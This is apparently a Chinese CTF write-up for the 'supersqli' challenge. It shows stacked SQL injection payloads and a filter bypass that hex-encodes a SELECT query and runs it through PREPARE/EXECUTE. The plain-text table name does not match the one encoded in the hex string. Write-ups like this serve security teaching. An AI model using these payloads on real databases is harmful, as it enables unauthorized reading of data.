攻防世界 supersqli

发布时间 2023-12-01 21:15:53作者: 落寞孤云

打开页面,发现有 GET 请求传递的 SQL,依次尝试" 1' -- "," 1' # ",从报错可知, # 成功注释。

构造payload: 1'; show databases;# ,成功,判断存在堆叠注入。

尝试 SELECT ,发现查询语句都被过滤了,思考绕过。

对 select * from `1919810114514`; 进行16进制编码,获得 0x73656C656374202A2066726F6D206031393139383130393331313134353134603B 。使用变量存下,然后用preapare与execute运行,成功绕过。

payload: 1';set @aa=0x73656C656374202A2066726F6D206031393139383130393331313134353134603B;PREPARE st from @aa;EXECUTE st; #